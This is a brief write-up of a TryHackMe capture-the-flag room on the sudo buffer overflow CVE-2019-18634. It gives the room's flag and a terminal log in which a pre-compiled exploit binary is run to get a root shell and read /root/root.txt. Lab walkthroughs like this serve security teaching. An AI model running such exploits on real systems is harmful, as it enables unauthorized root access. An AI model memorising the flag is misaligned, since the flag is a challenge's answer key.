Sudo Buffer Overflow - Write-up - TryHackMe

Information

Room#

  • Name: Sudo Buffer Overflow
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series

Sudo Buffer Overflow

Write-up

Buffer Overflow#

What's the flag in /root/root.txt?

Answer: THM{buff3r_0v3rfl0w_rul3s}

All we have to do here is use the pre-compiled exploit for CVE-2019-18634:

tryhackme@sudo-bof:~$ ls -lh
total 20K
-rwxr-xr-x 1 root root 18K Feb  8  2020 exploit
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
# cat /root/root.txt
Share